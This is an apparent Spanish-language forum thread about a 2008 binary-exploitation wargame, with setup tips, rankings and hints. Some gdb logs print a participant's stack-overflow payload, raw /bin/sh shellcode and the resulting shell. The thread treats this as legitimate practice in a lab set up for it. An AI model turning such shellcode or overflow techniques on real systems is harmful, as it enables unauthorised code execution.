XayOn no desesperes, yo hace 2 dias estaba igual, no sabia ni como empezar a buscar la dichosa shell, hasta que deje de hacer pruebas y me puse a leer sobre el tema, buscando y buscando di con las famosisimas revistas de Hack x Crack (desconocidas x mi, y muy buenas por cierto!) y en la 3ª entrega se puede sacar mas o menos una idea de como obtener la shell, luego ya es manual de la "navaja suiza" que dice Anon y das con la shell.
Animo! que seguro que la encuentras!
les puse SSH en el puerto 80.. aunque ta medio raro xD el ssh sigue corriendo en 22, pero protegido, y ahora en 80 por tunneling, esperemos funcione bien, odio PF, y el forwarding por SSH se deshabilito por seguridad, entonces fue todo un desmadre
--edit--
les puse un timeout de 20 segundos.. asi que se les cerrara la conexion en 20 segundos de inactividad.. pero no se desesperen xD que para eso existe screen.. solo pongan
screen
y si los desconecta entran denuevo y ponen
screen -r
Y les recupera la terminal como la tenian..
y luego, cuando quieran cerrar sesion ponen
Control+A D
y despues
exit
y cuando vuelvan entrar ponen screen -r otra vez, y les recuperara el entorno tal cual ;)
Si dejan algo muy pesado corriendo (CPU), les mataremos el proceso.. asi que nada de bromitas
Ah, y el timeout es porque ya tenemos un chingo de usuarios, y no queremos tener problemas :P jaja hay truquitos para que no haya timeout (en putty esta oculto por ahi, pero si tieen la opcion)
Saludos!!
Wiii, por fin me he podido logear, ahora que sigue? xDD
aah no se vale, ahora el putty me lanza error del drwatson y se cierra :P
Bueno no importa de todas formas puedo usar el absolute telnet.
Jaja es un verdadero desmadre!
Cita de: Carloswaldo en 5 Diciembre 2008, 01:27 AM
Wiii, por fin me he podido logear, ahora que sigue? xDD
Las Instrucciones estan en un archivo llamado TORNEO.txt
Bien esperamos mas participacion de su parte.
:D Suerte a todos.
Saludos!!
Bueno, si alguien quiere alguna herramienta especial, algun editor en especifico, envie un PM y vemos si se agrega la Herramienta.
Cualquier problema avisenme y vemos que pasa.
Citarles puse un timeout de 20 segundos.. asi que se les cerrara la conexion en 20 segundos de inactividad.. pero no se desesperen xD que para eso existe screen.. solo pongan
screen
y si los desconecta entran denuevo y ponen
screen -r
Y les recupera la terminal como la tenian..
y luego, cuando quieran cerrar sesion ponen
Control+A D
y despues
exit
Más fácil, el Absolute Telnet tiene una opción de keeps alives:
(http://img383.imageshack.us/img383/4564/dibujoaw0.png)
Con esto ya no te sacará hasta que cierres la sesión.
PD: Sigue siendo un pipe y por eso arroja errores al intentar iniciar sesión en algunos sistemas.
El comando netstat ya no sirve, aver si ahora bloquean también el comando "ps -aux" :xD se puede ver los usuarios que están dentro entre algunas cosillas mas como ver los servicios y ruta de algunos logs, pero bueno.. con eso no haces mucho.
Ya me aburrí, definitivamente no soy bueno para las explotaciones binarias. Otro dia con mas tiempo voy a leer mas.
Supongo que cuando termine van a decir como se pasaba con lujo y detalle para ir aprendiendo no? :P
Bien esta muy bien lo del absolute telnet. Ahora que tambien se puede usar Putty xD... en fin la herramienta es lo de menos.
Aqui una pagina con exelentes manuales de referencias de explotacion binaria.
http://www.orkspace.net/secdocs/
Y el texto siguiente es para poder pasar el primer reto:
Smashing The Stack For Fun And Profit by Aleph One
http://www.orkspace.net/secdocs/Unix/BO/Stack/Smashing%20The%20Stack%20For%20Fun%20And%20Profit.txt
Cita de: WHK en 6 Diciembre 2008, 06:55 AM
PD: Sigue siendo un pipe y por eso arroja errores al intentar iniciar sesión en algunos sistemas.
Si, si alguien tiene problema para entrar que me envie un PM, y veo que se puede hacer.
Agregue el ranking del torneo.. en /wzon.php sale abajo de donde deben meter su hash.
Ranking del Torneo
Nivel 1 /BoF
1. sch3m4
2. alt3kx
3. zosen
4. sylkat
Nivel 2 /HoF
1. sylkat
Nivel 3 /dejavu
Nadie ha pasado el tercero ni el cuarto nivel, y nadie ha rooteado.. jaja
Saludos!!
¿ Es cosa mía o no funciona ni el servidor ni la página web (wzon)???
Saludos!
Posdata: Esta vez no habrá sido el gato no????
Bueno, lo de la pagina de wzon pues no se que pase, pero si es cosa de sdc, ya me imagino que es.
Sobre la el servidor, esta offline, :( :-( cosa del ISP, :¬¬ segun eso queda en un rato mas :P. Espero y No demore bastante.
Ahora un Aviso: Esto va a estar Online hasta el dia Lunes 15, 0 horas GMT (Meridiano de Greenwich/Casablanca)
la pagina web si funciona.. no se ve el ranking, pero porque el servidor del torneo esta off..
Bueno, les he instalado el cgdb, para prueben algo diferente:
(http://i.elhacker.net/i?i=9guxv4W1dj51NHDFLTf1pmVo) (http://i.elhacker.net/d?i=9guxv4W1dj51NHDFLTf1pmVo)
Saludos y suerte.
Anon, subir images a i.elhacker.net luego sdc regaña a los que no lo hacen XDD
-berz3k.
Esta bien :P
jajajaj yo no regano... baneo.. jajaja
Cita de: sirdarckcat en 11 Diciembre 2008, 06:18 AM
jajajaj yo no regano... baneo.. jajaja
Esta bien ya entendi... :P
Hola que tal, bien :D solo con la noticia que he actualizado netEchoBuff
para que este imprima el buffer del lado del cliente.
Antes lo hacia del lado del server pero como el proceso es liberado de la terminal, hay veces que dependiendo de como te conectes al server, este puede o no imprimirte la informacion de salida :xD
Saludos
Una pregunta muy fácil de responder:
¿Va a haber puntos de reconocimiento para los que hayan
superado pruebas individuales (aún a pesar de no acabar
el torneo en su totalidad)?
Por otro lado comentar algo acerca de unos posts anteriores.
Personalmente creo que, dado que el objetivo del juego es
aprender, la gente deberia empezar a codear sus propios
shellcodes. De todos modos no hace falta que los faciliteis
aquí cuando en la red los hay a patadas.
Más que nada es que así la gente aprenderá un poco de las
diferencias existentes entre las sintaxis AT&T y/o NASM,
y se darán cuenta que las syscalls no son iguales en Linux
que en FreeBSD... (creo que en esto se me entiende, ya
mucha gente a visto aparecer "Bad System Call" };-D )
Un abrazo!
¿Va a haber puntos de reconocimiento para los que hayan
superado pruebas individuales (aún a pesar de no acabar
el torneo en su totalidad)?
si
Yo esperaria eso sdc,
Con las caidas del server, con el SSH que jamas logre conectar dede consola, el VT100 que no funcionaba correctamente, el shellcode FreeBSD que tuvimos que currarnos XDD en fin muchas cosas...
-berz3k.
Sdc, ok, tomo nota.
Pero entonces me viene otra pregunta a la cabeza: ¿Sirve de
algo crear documentación acerca de una sola prueba individual?
Respecto a lo de que ha sido incomodo jugar desde la shell...,
tampoco lo ha sido tanto. Yo por mi parte me he conectado con
un clasico:
$ ssh -l xxxxx shell.warzone.elhacker.net -p x
y he modificado el "/etc/ssh/ssh_config" con un:
ServerAliveInterval 15
para que no me diera la vara con el timeout! Por lo demás de
vez en cuando es algo lento pero para mi esta de sobra ;)
Por cierto...
¿Es normal lo de "Filesize limit exceeded" en el reto de HoF?
He comprobado con "limit" que disponemos de 8kb como
tope. He borrado los archivos temporales que habia creado
para BoF, pero todavía saca el mismo mensaje.
¿Hay algún problema?
A si, el archivio de entrada que creaste no tiene el formato adecuado :P, cuando no le pones en la primera linea un numero hace cosas raras :P
Hay que borrar el arachivo Output que te crea esta en /tmp.
Ya lo borre yo, y el limite son 8 MB :P.
Saludos.
Ok muchas gracias!
Esta tarde estudiaré el ejecutable (su código) en mi sistema!
Espero que no sean importantes las funciones "check()" &
"isspecial()" para el exploit en si.
Por cierto, ¿lo de "tmpBuffer[] = sbuffer[] - 2" es una pequeña
trampa para complicar un poquito más las cosas verdad?
Como digo, esta tarde toca tarea!
Un abrazo!
Perfecto :D
Cita de: blackngel en 12 Diciembre 2008, 13:59 PM
Esta tarde estudiaré el ejecutable (su código) en mi sistema!
Espero que no sean importantes las funciones "check()" &
"isspecial()" para el exploit en si.
check() es una funcion privada >:D :¬¬ :¬¬
Ahora isspecial es una funcion dentro de ctype:
Citar%man isspecial
ISSPECIAL(3) FreeBSD Library Functions Manual ISSPECIAL(3)
NAME
isspecial -- special character test
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <ctype.h>
int
isspecial(int c);
DESCRIPTION
The isspecial() function tests for a special character.
RETURN VALUES
The isspecial() function returns zero if the character tests false and
returns non-zero if the character tests true.
SEE ALSO
ctype(3), iswspecial(3)
HISTORY
The isspecial() function appeared in 4.4BSD.
FreeBSD 7.0 March 30, 2004 FreeBSD 7.0
Bien
Cita de: blackngel en 12 Diciembre 2008, 13:59 PM
Por cierto, ¿lo de "tmpBuffer[] = sbuffer[] - 2" es una pequeña
trampa para complicar un poquito más las cosas verdad?
Algo asi esque no siempre las explotaciones son con un simple paso libre en la memoria :D siempre hay algun tipo de filtro.
Lo otro... pues averigualo.
Saludos.
Jejeje...
AVERIGUADO! Creo que ha sido de las pruebas que más
me ha reconfortado! Desde luego esta si que me encantaría
documentarla, tiene mucha miga ;)
Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?
Bueno, a ver que toca ahora xD ¿Format String?
Un abrazo!
Que bien que la aigas pasado :D veo que estoy cumpliendo mi objetivo!!
Cita de: blackngel en 12 Diciembre 2008, 18:17 PM
Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?
Se lo comenta ayer a sdc, pero en realidad me fui a dormir por que tenia mucho sueño :xD, me imagino que si va a ver meritos, puntos no se, y menos lo de la cuenta @elhacker.net pero pues ya estas por buen camino :) en un rato mas y pasa el reto completo.
Cita de: blackngel en 12 Diciembre 2008, 18:17 PM
Bueno, a ver que toca ahora xD ¿Format String?
No exactamente un FS, pero el titulo dice dejavu creo que me recuerda a la pelicula de the matrix:
http://www.youtube.com/watch?v=z_KmNZNT5xw
Bien :)
Veremos que se puede hacer, aunque lo de acabarlo va estar
difícil.
Dos cuestiones:
- ¿Diferencia entre méritos y puntos?
- Comentar que es una pena no disponer de herramientas
como "strace" y/o "ltrace". ¿Es una decisón deliberada?
Saludos!
Hola que tal !!
:¬¬
Citar%man truss
Wikipedia
http://es.wikipedia.org/wiki/Strace
Citarstrace es una utilidad de comprobación de errores en el sistema operativo GNU/Linux que sirve para monitorizar las llamadas al sistema usadas por un determinado programa y todas las señales que éste recibe, es similar a la aplicación truss disponible en otros sistemas Unix. Esto es posible por una característica del núcleo linux llamada ptrace.
Ok ok...
Cuanto se aprende... :p
Pero ahora ser buenos. Alguna pista para la 3ª prueba?
Me ocurren cosas muy raras que no habia visto nunca!
Bye!
Hola que tal nuevamente :D veo que estas entretenido :xD :rolleyes:
Cita de: blackngel en 12 Diciembre 2008, 21:04 PM
Me ocurren cosas muy raras que no habia visto nunca!
Lo mismo me dije hace unos meses :)
pues la pista es que es un dejavu!! :¬¬ No es broma
Saludos.
Te pido un favor:
He creado un exploit ex1.c en mi directorio, y consigo una
shell "sh" si lo ejecuto desde "gdb" con "run 1029 5".
Salen 2 mensajes de SIGTRAP y debes escribir "c" 2 veces.
Luego tienes la shell pero no tengo permisos para hacer nada
mas.
Desde fuera y con los mismos parametros ($./ex1 1029 5) solo
consigo un "bus error".
No entiendo que demonios pasa, cuando vi la SHELL ya estaba
saltando de alegria :) y ahora nada!
Puedes echarle un vistazo y probarlo tu?
Muchas gracias! Un abrazo!
Bueno lo he probado y pues:
Citar
%gdb ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfec58 Offset: 0x5 Return: 0xbfbfec53
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:
1ÀPh//shh/binãPTSP°;Íì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿
Program received signal SIGBUS, Bus error.
0xbfbfec54 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGBUS, Bus error.
No dudo que te haya funcionado, sin embargo este dejavu es un dejavu :P... pero la matrix cambio algo >:D
Saludos.
CitarC:/Users/NikiSanders/Desktop>gdb ./ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfebf8 Offset: 0x5 Return: 0xbfbfebf3
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PTSP�;̀뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x088643e0 in _rtld_thread_init () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
$ id
uid=7027(NikiSanders) gid=6001(warusers) groups=6001(warusers),5000(warzone),5001(warzone1),5002(warzone2)
$ exit
Program exited normally.
(gdb)
A ya me acorde por que suele suceder eso, bueno resulta que el valor del get_esp cambia dependiendo de la cantidad de procesos que exista en memoria, tal vez por eso no me salio.
Muchas veces por ejemplo hago cosas asi con modo grafico y pues el offset del exploit es uno, y despues lo hago en modo terminal y pues otro tanto.
Voy a ver lo del exploit y te veo que pasa.
Saludos.
Ok, veo que lo de dormir tampoco es lo tuyo :)
Esperaré ansioso tus observaciones! Me hace gracia,
porque yo consigo una shell xD, lo cual quiere decir
que en definitiva la ejecuta el propopio "dejavu", lo
que ocurre que lo hace dentro de "ex1" y este dentro
de "gdb".
1 ->Una llamada a execve sustituye un proceso por otro,
y cambian los permisos entoces "ex1" hace bien su trabajo.
2 -> Gdb no es sustituido al ejecutar el proceso sino que lo
mantiene en un entorno controlado (hasta donde yo entiendo)
y debe ser por eso que no obtengo los permisos, quizas
porque se mantienen los mismos con los que he ejecutado "gdb"
En fin, no se... que penita! ;)
Un abrazo!
Jeje, prueba pasada! Tengo buen despertar :)
Tenías razón, fui tan necio de no fijarme que el %esp
cambiaba al ejecutar la aplicacion sola en gdb. Tenia
la solución delante de mis narices xD
Muchas gracias por todo y a seguir!
Nada.. no hay manera en la 4ª :)
He visto lo de "broken pipe" pero no tengo ni idea de
si ese error se puede aprovechar para algo!
Alguien va a terminar el torneo? xDDD
mmm :¬¬,
Antes
Citar
Program terminated with signal 11, Segmentation fault.
#0 0x20202020 in ?? ()
A ver si ahora si!!, a peticion de algunos por privado he cambiado el orden de una variable, tal vez no esta muy obvio pero en fin, he quitado la trampa :P, Ahora esta mas facil
Despues
Citar
Program terminated with signal 11, Segmentation fault.
#0 0x20202020 in ?? ()
Saludos.
... ni pajolera...
Ahora ya no consigo ni el "broken pipe" menos todavía un
"segmentation fault". No se por donde van los tiros.
A ver si resulta que se me va a dar mejor la documentación
que la explotacion :)
Lo del Broken pipe, solo tedecia estabas sobre escribiendo algo que no debias sobre escribir, en fin.
Ahora como le movido la variable de la trampa ya se deberia de tener acceso directo a la memoria.
Vas muy rapido ;D y vas bien.
Saludos.
Bien, la cosa va bien :D al parecer algunos si se han estado divirtiendo,
Ya hay 1 Ganador: zosen
Y ya alguien rooteo ;D
CitarR00ted by TopoLB
:¬¬ Es el nick de Warzone ? no lo veo !! :P a quien le damos los puntos ?
Bueno
He dado sufientes pistas como para que sepan ya donde atacar, en Aproximandamente 21 Hrs, se cierra temporalmente el Torneo.
El Ranking
Final es el siguiente.
Nivel 4 /netEchoBuff (Ganadores)
Nivel 3 /dejavu
Nivel 2 /HoF
Nivel 1 /BoF
- sch3m4
- alt3kx
- raise_enyesec
Ya se cerro el Torneo, tal vez sea temporalmente, sin embargo esperen NoticiasSaludos y suerte.
Hola,
No es que me importe demasiado...pero creo que solo me ha subido 9 puntos, no eran 15? ;D Olvidé meter el último hash en la web de warzone, puede que sea por eso??
Por cierto, buen reto. Se echaba de menos wargames de este tipo. Para cuando el próximo?? ;)
Saludos
Pues los puntos Adicionales los va a poner sdc.
Ahora que Felicidades!!
Se estan planeando muchas cosas esten pendientes.
Saludos.
Se supo quien es topoLB ?
un00
he estado registrandome como un loco en warzone y no puedo entrar creo k es culpa del server alguien me puede decir si ay algun problema??